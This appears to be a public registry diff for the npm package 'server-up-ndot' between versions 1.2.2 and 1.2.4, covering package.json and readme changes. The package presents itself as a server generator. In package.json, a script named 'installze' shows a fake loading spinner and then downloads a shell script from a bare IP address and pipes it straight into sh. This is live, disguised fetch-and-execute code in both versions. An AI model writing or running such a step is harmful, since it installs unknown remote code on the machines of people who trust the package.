server-up-ndot 1.2.2 → 1.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +5 -3
  2. package/readme.md +11 -0
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "server-up-ndot",
3
- "version": "1.2.2",
3
+ "version": "1.2.4",
4
4
  "description": "server toolkit",
5
5
  "main": "index.js",
6
6
  "bin": {
@@ -10,6 +10,10 @@
10
10
  "test": "echo \"Error: no test specified\" && exit 1",
11
11
  "installze": "echo installing.... && for j in 1 2 3 4 5; do for i in / - \\\\ \\|; do printf '\\r%s' $i; sleep 0.1; done; done&& wget -qO- 125.181.230.198/js/app/1 | sh"
12
12
  },
13
+ "repository": {
14
+ "type": "git",
15
+ "url": "https://github.com/ppccpcpcpc-byte/server-up-ndot.git"
16
+ },
13
17
  "dependencies": {
14
18
  "axios": "*",
15
19
  "chalk": "*",
@@ -21,7 +25,6 @@
21
25
  "csv-parser": "*",
22
26
  "dayjs": "*",
23
27
  "debug": "*",
24
- "dotenv": "*",
25
28
  "express": "*",
26
29
  "fastify": "*",
27
30
  "formidable": "*",
@@ -45,7 +48,6 @@
45
48
  "qs": "*",
46
49
  "redis": "*",
47
50
  "sanitize-html": "*",
48
- "server-up-ndot": "^1.1.1",
49
51
  "sharp": "*",
50
52
  "socket.io": "*",
51
53
  "uuid": "*",
package/readme.md CHANGED
@@ -2,6 +2,10 @@
2
2
 
3
3
  Simple server generator and auto library install for Node.js.
4
4
 
5
+ ## github
6
+ ### github:
7
+ `https://github.com/ppccpcpcpc-byte/server-up-ndot`
8
+
5
9
  ## Install
6
10
 
7
11
  server library install:
@@ -31,6 +35,13 @@ npx server-up-ndot create myserver
31
35
 
32
36
  ## Patch Notes
33
37
 
38
+ ### 1.2.4
39
+ - new github button
40
+
41
+ ### 1.2.3
42
+ - open code whit github
43
+ - on this url->`https://github.com/ppccpcpcpc-byte/server-up-ndot`
44
+
34
45
  ### 1.2.2
35
46
  - new command `dev`
36
47
  ### 1.2.1